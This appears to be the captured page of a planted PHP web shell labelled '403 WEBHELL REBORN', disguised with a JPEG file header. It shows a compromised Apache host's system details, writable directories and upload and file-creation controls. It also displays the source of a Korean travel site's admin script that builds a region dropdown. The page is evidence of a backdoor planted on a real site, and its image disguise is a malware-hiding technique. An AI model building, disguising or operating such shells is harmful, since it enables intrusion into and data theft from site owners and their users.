ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/toadmin/hotel_event/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/toadmin/hotel_event/area_ajax.php
<?
include "../include/top_proc.html";//공통파일 인클루드
include "_common.php";

if(!$city_cd)exit;

//지역 출력
if($SqlType=="area"){
	$data_area = base_codec("ASA",$city_cd);//도시 코드
?>
		<select name="area_cd" id="area_cd" class="lo_left">
			<option value="">==지역==</option>
			<?
				for($i=0 ; $i < count($data_area) ; $i++){
					$row = $data_area[$i];
			?>
			<option value="<?=$row['code']?>"><?=$row['cd_nm']?></option>
			<?}?>
		</select>
<?}?>

Anon7 - 2021